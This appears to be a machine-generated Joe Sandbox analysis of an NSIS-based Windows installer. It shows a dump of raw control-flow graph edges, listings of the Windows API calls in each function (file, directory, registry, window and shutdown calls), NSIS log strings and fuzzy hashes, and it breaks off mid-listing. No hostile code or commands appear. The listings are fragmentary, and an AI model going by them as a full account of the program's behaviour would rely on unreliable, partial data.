3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 
3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 
4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 
3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 004038A2
                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                    • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                    • API String ID: 2435955865-239407132
                                                                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                    Control-flow Graph

                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                    Strings
                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                    • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                    • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 608394941-1650083594
                                                                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,232,232,00000000,00000000,232,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                    • String ID: 232$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                    • API String ID: 4286501637-2656113216
                                                                                                    • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                    • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                    Strings
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                    • Inst, xrefs: 0040366C
                                                                                                    • soft, xrefs: 00403675
                                                                                                    • Error launching installer, xrefs: 004035D7
                                                                                                    • Null, xrefs: 0040367E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmp
